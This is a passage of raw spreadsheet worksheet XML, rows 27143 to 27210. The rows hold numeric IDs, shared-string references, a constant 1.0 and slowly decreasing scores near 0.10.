      <c r="D27143" s="2">
        <v>1.0</v>
      </c>
      <c r="E27143" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27143" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27144" ht="15.75" customHeight="1">
      <c r="A27144" s="1">
        <v>18413.0</v>
      </c>
      <c r="B27144" s="2">
        <v>5.2686664E7</v>
      </c>
      <c r="C27144" s="2" t="s">
        <v>26084</v>
      </c>
      <c r="D27144" s="2">
        <v>1.0</v>
      </c>
      <c r="E27144" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27144" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27145" ht="15.75" customHeight="1">
      <c r="A27145" s="1">
        <v>19276.0</v>
      </c>
      <c r="B27145" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C27145" s="2" t="s">
        <v>26085</v>
      </c>
      <c r="D27145" s="2">
        <v>1.0</v>
      </c>
      <c r="E27145" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27145" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27146" ht="15.75" customHeight="1">
      <c r="A27146" s="1">
        <v>23354.0</v>
      </c>
      <c r="B27146" s="2">
        <v>5488897.0</v>
      </c>
      <c r="C27146" s="2" t="s">
        <v>26086</v>
      </c>
      <c r="D27146" s="2">
        <v>1.0</v>
      </c>
      <c r="E27146" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27146" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27147" ht="15.75" customHeight="1">
      <c r="A27147" s="1">
        <v>24264.0</v>
      </c>
      <c r="B27147" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C27147" s="2" t="s">
        <v>26087</v>
      </c>
      <c r="D27147" s="2">
        <v>1.0</v>
      </c>
      <c r="E27147" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27147" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27148" ht="15.75" customHeight="1">
      <c r="A27148" s="1">
        <v>26595.0</v>
      </c>
      <c r="B27148" s="2">
        <v>1.7966624E7</v>
      </c>
      <c r="C27148" s="2" t="s">
        <v>26088</v>
      </c>
      <c r="D27148" s="2">
        <v>1.0</v>
      </c>
      <c r="E27148" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27148" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27149" ht="15.75" customHeight="1">
      <c r="A27149" s="1">
        <v>29863.0</v>
      </c>
      <c r="B27149" s="2">
        <v>3.5890392E7</v>
      </c>
      <c r="C27149" s="2" t="s">
        <v>26089</v>
      </c>
      <c r="D27149" s="2">
        <v>1.0</v>
      </c>
      <c r="E27149" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27149" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="27150" ht="15.75" customHeight="1">
      <c r="A27150" s="1">
        <v>8655.0</v>
      </c>
      <c r="B27150" s="2">
        <v>5.4353711E7</v>
      </c>
      <c r="C27150" s="2" t="s">
        <v>26090</v>
      </c>
      <c r="D27150" s="2">
        <v>1.0</v>
      </c>
      <c r="E27150" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27150" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="27151" ht="15.75" customHeight="1">
      <c r="A27151" s="1">
        <v>13976.0</v>
      </c>
      <c r="B27151" s="2">
        <v>3.7344915E7</v>
      </c>
      <c r="C27151" s="2" t="s">
        <v>26091</v>
      </c>
      <c r="D27151" s="2">
        <v>1.0</v>
      </c>
      <c r="E27151" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27151" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="27152" ht="15.75" customHeight="1">
      <c r="A27152" s="1">
        <v>31809.0</v>
      </c>
      <c r="B27152" s="2">
        <v>5.2488179E7</v>
      </c>
      <c r="C27152" s="2" t="s">
        <v>26092</v>
      </c>
      <c r="D27152" s="2">
        <v>1.0</v>
      </c>
      <c r="E27152" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27152" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="27153" ht="15.75" customHeight="1">
      <c r="A27153" s="1">
        <v>3430.0</v>
      </c>
      <c r="B27153" s="2">
        <v>3.8198247E7</v>
      </c>
      <c r="C27153" s="2" t="s">
        <v>26093</v>
      </c>
      <c r="D27153" s="2">
        <v>1.0</v>
      </c>
      <c r="E27153" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27153" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="27154" ht="15.75" customHeight="1">
      <c r="A27154" s="1">
        <v>9275.0</v>
      </c>
      <c r="B27154" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C27154" s="2" t="s">
        <v>26094</v>
      </c>
      <c r="D27154" s="2">
        <v>1.0</v>
      </c>
      <c r="E27154" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27154" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="27155" ht="15.75" customHeight="1">
      <c r="A27155" s="1">
        <v>10676.0</v>
      </c>
      <c r="B27155" s="2">
        <v>1.4535645E7</v>
      </c>
      <c r="C27155" s="2" t="s">
        <v>26095</v>
      </c>
      <c r="D27155" s="2">
        <v>1.0</v>
      </c>
      <c r="E27155" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27155" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="27156" ht="15.75" customHeight="1">
      <c r="A27156" s="1">
        <v>14967.0</v>
      </c>
      <c r="B27156" s="2">
        <v>4.1345539E7</v>
      </c>
      <c r="C27156" s="2" t="s">
        <v>26096</v>
      </c>
      <c r="D27156" s="2">
        <v>1.0</v>
      </c>
      <c r="E27156" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27156" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="27157" ht="15.75" customHeight="1">
      <c r="A27157" s="1">
        <v>27518.0</v>
      </c>
      <c r="B27157" s="2">
        <v>2.2167347E7</v>
      </c>
      <c r="C27157" s="2" t="s">
        <v>26097</v>
      </c>
      <c r="D27157" s="2">
        <v>1.0</v>
      </c>
      <c r="E27157" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27157" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="27158" ht="15.75" customHeight="1">
      <c r="A27158" s="1">
        <v>32163.0</v>
      </c>
      <c r="B27158" s="2">
        <v>5442181.0</v>
      </c>
      <c r="C27158" s="2" t="s">
        <v>26098</v>
      </c>
      <c r="D27158" s="2">
        <v>1.0</v>
      </c>
      <c r="E27158" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27158" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="27159" ht="15.75" customHeight="1">
      <c r="A27159" s="1">
        <v>8018.0</v>
      </c>
      <c r="B27159" s="2">
        <v>5.2800118E7</v>
      </c>
      <c r="C27159" s="2" t="s">
        <v>26099</v>
      </c>
      <c r="D27159" s="2">
        <v>1.0</v>
      </c>
      <c r="E27159" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27159" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="27160" ht="15.75" customHeight="1">
      <c r="A27160" s="1">
        <v>28869.0</v>
      </c>
      <c r="B27160" s="2">
        <v>2.9120631E7</v>
      </c>
      <c r="C27160" s="2" t="s">
        <v>26100</v>
      </c>
      <c r="D27160" s="2">
        <v>1.0</v>
      </c>
      <c r="E27160" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27160" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="27161" ht="15.75" customHeight="1">
      <c r="A27161" s="1">
        <v>263.0</v>
      </c>
      <c r="B27161" s="2">
        <v>1.514975E7</v>
      </c>
      <c r="C27161" s="2" t="s">
        <v>26101</v>
      </c>
      <c r="D27161" s="2">
        <v>1.0</v>
      </c>
      <c r="E27161" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27161" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27162" ht="15.75" customHeight="1">
      <c r="A27162" s="1">
        <v>6404.0</v>
      </c>
      <c r="B27162" s="2">
        <v>4.8485112E7</v>
      </c>
      <c r="C27162" s="2" t="s">
        <v>26102</v>
      </c>
      <c r="D27162" s="2">
        <v>1.0</v>
      </c>
      <c r="E27162" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27162" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27163" ht="15.75" customHeight="1">
      <c r="A27163" s="1">
        <v>12902.0</v>
      </c>
      <c r="B27163" s="2">
        <v>3.207467E7</v>
      </c>
      <c r="C27163" s="2" t="s">
        <v>26103</v>
      </c>
      <c r="D27163" s="2">
        <v>1.0</v>
      </c>
      <c r="E27163" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27163" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27164" ht="15.75" customHeight="1">
      <c r="A27164" s="1">
        <v>16446.0</v>
      </c>
      <c r="B27164" s="2">
        <v>4.6409958E7</v>
      </c>
      <c r="C27164" s="2" t="s">
        <v>26104</v>
      </c>
      <c r="D27164" s="2">
        <v>1.0</v>
      </c>
      <c r="E27164" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27164" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27165" ht="15.75" customHeight="1">
      <c r="A27165" s="1">
        <v>19373.0</v>
      </c>
      <c r="B27165" s="2">
        <v>5.5482878E7</v>
      </c>
      <c r="C27165" s="2" t="s">
        <v>26105</v>
      </c>
      <c r="D27165" s="2">
        <v>1.0</v>
      </c>
      <c r="E27165" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27165" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27166" ht="15.75" customHeight="1">
      <c r="A27166" s="1">
        <v>24944.0</v>
      </c>
      <c r="B27166" s="2">
        <v>1.2512942E7</v>
      </c>
      <c r="C27166" s="2" t="s">
        <v>26106</v>
      </c>
      <c r="D27166" s="2">
        <v>1.0</v>
      </c>
      <c r="E27166" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27166" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27167" ht="15.75" customHeight="1">
      <c r="A27167" s="1">
        <v>25373.0</v>
      </c>
      <c r="B27167" s="2">
        <v>1.3611545E7</v>
      </c>
      <c r="C27167" s="2" t="s">
        <v>26107</v>
      </c>
      <c r="D27167" s="2">
        <v>1.0</v>
      </c>
      <c r="E27167" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27167" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27168" ht="15.75" customHeight="1">
      <c r="A27168" s="1">
        <v>26908.0</v>
      </c>
      <c r="B27168" s="2">
        <v>1.9327889E7</v>
      </c>
      <c r="C27168" s="2" t="s">
        <v>26108</v>
      </c>
      <c r="D27168" s="2">
        <v>1.0</v>
      </c>
      <c r="E27168" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27168" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="27169" ht="15.75" customHeight="1">
      <c r="A27169" s="1">
        <v>9398.0</v>
      </c>
      <c r="B27169" s="2">
        <v>5.5752198E7</v>
      </c>
      <c r="C27169" s="2" t="s">
        <v>26109</v>
      </c>
      <c r="D27169" s="2">
        <v>1.0</v>
      </c>
      <c r="E27169" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27169" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="27170" ht="15.75" customHeight="1">
      <c r="A27170" s="1">
        <v>13604.0</v>
      </c>
      <c r="B27170" s="2">
        <v>3.5809504E7</v>
      </c>
      <c r="C27170" s="2" t="s">
        <v>26110</v>
      </c>
      <c r="D27170" s="2">
        <v>1.0</v>
      </c>
      <c r="E27170" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27170" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="27171" ht="15.75" customHeight="1">
      <c r="A27171" s="1">
        <v>19779.0</v>
      </c>
      <c r="B27171" s="2">
        <v>5.6776419E7</v>
      </c>
      <c r="C27171" s="2" t="s">
        <v>26111</v>
      </c>
      <c r="D27171" s="2">
        <v>1.0</v>
      </c>
      <c r="E27171" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27171" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="27172" ht="15.75" customHeight="1">
      <c r="A27172" s="1">
        <v>21720.0</v>
      </c>
      <c r="B27172" s="2">
        <v>2.5547065E7</v>
      </c>
      <c r="C27172" s="2" t="s">
        <v>26112</v>
      </c>
      <c r="D27172" s="2">
        <v>1.0</v>
      </c>
      <c r="E27172" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27172" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="27173" ht="15.75" customHeight="1">
      <c r="A27173" s="1">
        <v>23381.0</v>
      </c>
      <c r="B27173" s="2">
        <v>5.5581819E7</v>
      </c>
      <c r="C27173" s="2" t="s">
        <v>7323</v>
      </c>
      <c r="D27173" s="2">
        <v>1.0</v>
      </c>
      <c r="E27173" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27173" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="27174" ht="15.75" customHeight="1">
      <c r="A27174" s="1">
        <v>2437.0</v>
      </c>
      <c r="B27174" s="2">
        <v>3.3667358E7</v>
      </c>
      <c r="C27174" s="2" t="s">
        <v>26113</v>
      </c>
      <c r="D27174" s="2">
        <v>1.0</v>
      </c>
      <c r="E27174" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27174" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="27175" ht="15.75" customHeight="1">
      <c r="A27175" s="1">
        <v>4276.0</v>
      </c>
      <c r="B27175" s="2">
        <v>4.187471E7</v>
      </c>
      <c r="C27175" s="2" t="s">
        <v>26114</v>
      </c>
      <c r="D27175" s="2">
        <v>1.0</v>
      </c>
      <c r="E27175" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27175" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="27176" ht="15.75" customHeight="1">
      <c r="A27176" s="1">
        <v>11322.0</v>
      </c>
      <c r="B27176" s="2">
        <v>2.1080342E7</v>
      </c>
      <c r="C27176" s="2" t="s">
        <v>26115</v>
      </c>
      <c r="D27176" s="2">
        <v>1.0</v>
      </c>
      <c r="E27176" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27176" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="27177" ht="15.75" customHeight="1">
      <c r="A27177" s="1">
        <v>18587.0</v>
      </c>
      <c r="B27177" s="2">
        <v>5.3256744E7</v>
      </c>
      <c r="C27177" s="2" t="s">
        <v>26116</v>
      </c>
      <c r="D27177" s="2">
        <v>1.0</v>
      </c>
      <c r="E27177" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27177" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="27178" ht="15.75" customHeight="1">
      <c r="A27178" s="1">
        <v>31888.0</v>
      </c>
      <c r="B27178" s="2">
        <v>5286976.0</v>
      </c>
      <c r="C27178" s="2" t="s">
        <v>26117</v>
      </c>
      <c r="D27178" s="2">
        <v>1.0</v>
      </c>
      <c r="E27178" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27178" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="27179" ht="15.75" customHeight="1">
      <c r="A27179" s="1">
        <v>18597.0</v>
      </c>
      <c r="B27179" s="2">
        <v>5.3259342E7</v>
      </c>
      <c r="C27179" s="2" t="s">
        <v>26118</v>
      </c>
      <c r="D27179" s="2">
        <v>1.0</v>
      </c>
      <c r="E27179" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27179" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="27180" ht="15.75" customHeight="1">
      <c r="A27180" s="1">
        <v>21602.0</v>
      </c>
      <c r="B27180" s="2">
        <v>2.42028E7</v>
      </c>
      <c r="C27180" s="2" t="s">
        <v>6733</v>
      </c>
      <c r="D27180" s="2">
        <v>1.0</v>
      </c>
      <c r="E27180" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27180" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="27181" ht="15.75" customHeight="1">
      <c r="A27181" s="1">
        <v>24916.0</v>
      </c>
      <c r="B27181" s="2">
        <v>1.2353734E7</v>
      </c>
      <c r="C27181" s="2" t="s">
        <v>26119</v>
      </c>
      <c r="D27181" s="2">
        <v>1.0</v>
      </c>
      <c r="E27181" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27181" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="27182" ht="15.75" customHeight="1">
      <c r="A27182" s="1">
        <v>25970.0</v>
      </c>
      <c r="B27182" s="2">
        <v>1.5277916E7</v>
      </c>
      <c r="C27182" s="2" t="s">
        <v>26120</v>
      </c>
      <c r="D27182" s="2">
        <v>1.0</v>
      </c>
      <c r="E27182" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27182" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="27183" ht="15.75" customHeight="1">
      <c r="A27183" s="1">
        <v>6085.0</v>
      </c>
      <c r="B27183" s="2">
        <v>4.7682541E7</v>
      </c>
      <c r="C27183" s="2" t="s">
        <v>26121</v>
      </c>
      <c r="D27183" s="2">
        <v>1.0</v>
      </c>
      <c r="E27183" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27183" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="27184" ht="15.75" customHeight="1">
      <c r="A27184" s="1">
        <v>24522.0</v>
      </c>
      <c r="B27184" s="2">
        <v>1.1164489E7</v>
      </c>
      <c r="C27184" s="2" t="s">
        <v>26122</v>
      </c>
      <c r="D27184" s="2">
        <v>1.0</v>
      </c>
      <c r="E27184" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27184" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="27185" ht="15.75" customHeight="1">
      <c r="A27185" s="1">
        <v>26366.0</v>
      </c>
      <c r="B27185" s="2">
        <v>1.6880444E7</v>
      </c>
      <c r="C27185" s="2" t="s">
        <v>26123</v>
      </c>
      <c r="D27185" s="2">
        <v>1.0</v>
      </c>
      <c r="E27185" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27185" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="27186" ht="15.75" customHeight="1">
      <c r="A27186" s="1">
        <v>30999.0</v>
      </c>
      <c r="B27186" s="2">
        <v>4.7609721E7</v>
      </c>
      <c r="C27186" s="2" t="s">
        <v>26124</v>
      </c>
      <c r="D27186" s="2">
        <v>1.0</v>
      </c>
      <c r="E27186" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27186" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="27187" ht="15.75" customHeight="1">
      <c r="A27187" s="1">
        <v>2407.0</v>
      </c>
      <c r="B27187" s="2">
        <v>3.3452189E7</v>
      </c>
      <c r="C27187" s="2" t="s">
        <v>26125</v>
      </c>
      <c r="D27187" s="2">
        <v>1.0</v>
      </c>
      <c r="E27187" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27187" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="27188" ht="15.75" customHeight="1">
      <c r="A27188" s="1">
        <v>9775.0</v>
      </c>
      <c r="B27188" s="2">
        <v>5.6506632E7</v>
      </c>
      <c r="C27188" s="2" t="s">
        <v>26126</v>
      </c>
      <c r="D27188" s="2">
        <v>1.0</v>
      </c>
      <c r="E27188" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27188" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="27189" ht="15.75" customHeight="1">
      <c r="A27189" s="1">
        <v>12234.0</v>
      </c>
      <c r="B27189" s="2">
        <v>2.7865678E7</v>
      </c>
      <c r="C27189" s="2" t="s">
        <v>26127</v>
      </c>
      <c r="D27189" s="2">
        <v>1.0</v>
      </c>
      <c r="E27189" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27189" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="27190" ht="15.75" customHeight="1">
      <c r="A27190" s="1">
        <v>25224.0</v>
      </c>
      <c r="B27190" s="2">
        <v>1.3309378E7</v>
      </c>
      <c r="C27190" s="2" t="s">
        <v>26128</v>
      </c>
      <c r="D27190" s="2">
        <v>1.0</v>
      </c>
      <c r="E27190" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27190" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="27191" ht="15.75" customHeight="1">
      <c r="A27191" s="1">
        <v>25690.0</v>
      </c>
      <c r="B27191" s="2">
        <v>1.4524834E7</v>
      </c>
      <c r="C27191" s="2" t="s">
        <v>26129</v>
      </c>
      <c r="D27191" s="2">
        <v>1.0</v>
      </c>
      <c r="E27191" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27191" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="27192" ht="15.75" customHeight="1">
      <c r="A27192" s="1">
        <v>33198.0</v>
      </c>
      <c r="B27192" s="2">
        <v>7162244.0</v>
      </c>
      <c r="C27192" s="2" t="s">
        <v>26130</v>
      </c>
      <c r="D27192" s="2">
        <v>1.0</v>
      </c>
      <c r="E27192" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27192" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="27193" ht="15.75" customHeight="1">
      <c r="A27193" s="1">
        <v>33732.0</v>
      </c>
      <c r="B27193" s="2">
        <v>8526329.0</v>
      </c>
      <c r="C27193" s="2" t="s">
        <v>26131</v>
      </c>
      <c r="D27193" s="2">
        <v>1.0</v>
      </c>
      <c r="E27193" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27193" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="27194" ht="15.75" customHeight="1">
      <c r="A27194" s="1">
        <v>1384.0</v>
      </c>
      <c r="B27194" s="2">
        <v>2.6130427E7</v>
      </c>
      <c r="C27194" s="2" t="s">
        <v>26132</v>
      </c>
      <c r="D27194" s="2">
        <v>1.0</v>
      </c>
      <c r="E27194" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27194" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="27195" ht="15.75" customHeight="1">
      <c r="A27195" s="1">
        <v>26306.0</v>
      </c>
      <c r="B27195" s="2">
        <v>1.6615352E7</v>
      </c>
      <c r="C27195" s="2" t="s">
        <v>26133</v>
      </c>
      <c r="D27195" s="2">
        <v>1.0</v>
      </c>
      <c r="E27195" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27195" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="27196" ht="15.75" customHeight="1">
      <c r="A27196" s="1">
        <v>7364.0</v>
      </c>
      <c r="B27196" s="2">
        <v>5.101947E7</v>
      </c>
      <c r="C27196" s="2" t="s">
        <v>26134</v>
      </c>
      <c r="D27196" s="2">
        <v>1.0</v>
      </c>
      <c r="E27196" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27196" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27197" ht="15.75" customHeight="1">
      <c r="A27197" s="1">
        <v>8251.0</v>
      </c>
      <c r="B27197" s="2">
        <v>5.3379106E7</v>
      </c>
      <c r="C27197" s="2" t="s">
        <v>26135</v>
      </c>
      <c r="D27197" s="2">
        <v>1.0</v>
      </c>
      <c r="E27197" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27197" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27198" ht="15.75" customHeight="1">
      <c r="A27198" s="1">
        <v>11112.0</v>
      </c>
      <c r="B27198" s="2">
        <v>1.8780299E7</v>
      </c>
      <c r="C27198" s="2" t="s">
        <v>26136</v>
      </c>
      <c r="D27198" s="2">
        <v>1.0</v>
      </c>
      <c r="E27198" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27198" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27199" ht="15.75" customHeight="1">
      <c r="A27199" s="1">
        <v>17884.0</v>
      </c>
      <c r="B27199" s="2">
        <v>5.1048565E7</v>
      </c>
      <c r="C27199" s="2" t="s">
        <v>26137</v>
      </c>
      <c r="D27199" s="2">
        <v>1.0</v>
      </c>
      <c r="E27199" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27199" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27200" ht="15.75" customHeight="1">
      <c r="A27200" s="1">
        <v>23719.0</v>
      </c>
      <c r="B27200" s="2">
        <v>7206084.0</v>
      </c>
      <c r="C27200" s="2" t="s">
        <v>6485</v>
      </c>
      <c r="D27200" s="2">
        <v>1.0</v>
      </c>
      <c r="E27200" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27200" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27201" ht="15.75" customHeight="1">
      <c r="A27201" s="1">
        <v>24773.0</v>
      </c>
      <c r="B27201" s="2">
        <v>1.1874091E7</v>
      </c>
      <c r="C27201" s="2" t="s">
        <v>26138</v>
      </c>
      <c r="D27201" s="2">
        <v>1.0</v>
      </c>
      <c r="E27201" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27201" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27202" ht="15.75" customHeight="1">
      <c r="A27202" s="1">
        <v>26607.0</v>
      </c>
      <c r="B27202" s="2">
        <v>1.7991168E7</v>
      </c>
      <c r="C27202" s="2" t="s">
        <v>26139</v>
      </c>
      <c r="D27202" s="2">
        <v>1.0</v>
      </c>
      <c r="E27202" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27202" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="27203" ht="15.75" customHeight="1">
      <c r="A27203" s="1">
        <v>1803.0</v>
      </c>
      <c r="B27203" s="2">
        <v>2.9137578E7</v>
      </c>
      <c r="C27203" s="2" t="s">
        <v>26140</v>
      </c>
      <c r="D27203" s="2">
        <v>1.0</v>
      </c>
      <c r="E27203" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27203" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="27204" ht="15.75" customHeight="1">
      <c r="A27204" s="1">
        <v>5181.0</v>
      </c>
      <c r="B27204" s="2">
        <v>4.4765326E7</v>
      </c>
      <c r="C27204" s="2" t="s">
        <v>26141</v>
      </c>
      <c r="D27204" s="2">
        <v>1.0</v>
      </c>
      <c r="E27204" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27204" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="27205" ht="15.75" customHeight="1">
      <c r="A27205" s="1">
        <v>10813.0</v>
      </c>
      <c r="B27205" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C27205" s="2" t="s">
        <v>26142</v>
      </c>
      <c r="D27205" s="2">
        <v>1.0</v>
      </c>
      <c r="E27205" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27205" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="27206" ht="15.75" customHeight="1">
      <c r="A27206" s="1">
        <v>31349.0</v>
      </c>
      <c r="B27206" s="2">
        <v>4985313.0</v>
      </c>
      <c r="C27206" s="2" t="s">
        <v>26143</v>
      </c>
      <c r="D27206" s="2">
        <v>1.0</v>
      </c>
      <c r="E27206" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27206" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="27207" ht="15.75" customHeight="1">
      <c r="A27207" s="1">
        <v>33315.0</v>
      </c>
      <c r="B27207" s="2">
        <v>7523176.0</v>
      </c>
      <c r="C27207" s="2" t="s">
        <v>26144</v>
      </c>
      <c r="D27207" s="2">
        <v>1.0</v>
      </c>
      <c r="E27207" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27207" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="27208" ht="15.75" customHeight="1">
      <c r="A27208" s="1">
        <v>6372.0</v>
      </c>
      <c r="B27208" s="2">
        <v>4.8382842E7</v>
      </c>
      <c r="C27208" s="2" t="s">
        <v>26145</v>
      </c>
      <c r="D27208" s="2">
        <v>1.0</v>
      </c>
      <c r="E27208" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27208" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27209" ht="15.75" customHeight="1">
      <c r="A27209" s="1">
        <v>8278.0</v>
      </c>
      <c r="B27209" s="2">
        <v>5.346863E7</v>
      </c>
      <c r="C27209" s="2" t="s">
        <v>26146</v>
      </c>
      <c r="D27209" s="2">
        <v>1.0</v>
      </c>
      <c r="E27209" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27209" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="27210" ht="15.75" customHeight="1">
      <c r="A27210" s="1">
        <v>13946.0</v>
      </c>
      <c r="B27210" s="2">
        <v>3.7198649E7</v>
      </c>
      <c r="C27210" s="2" t="s">
        <v>26147</v>
      </c>
      <c r="D27210" s="2">
        <v>1.0</v>
      </c>
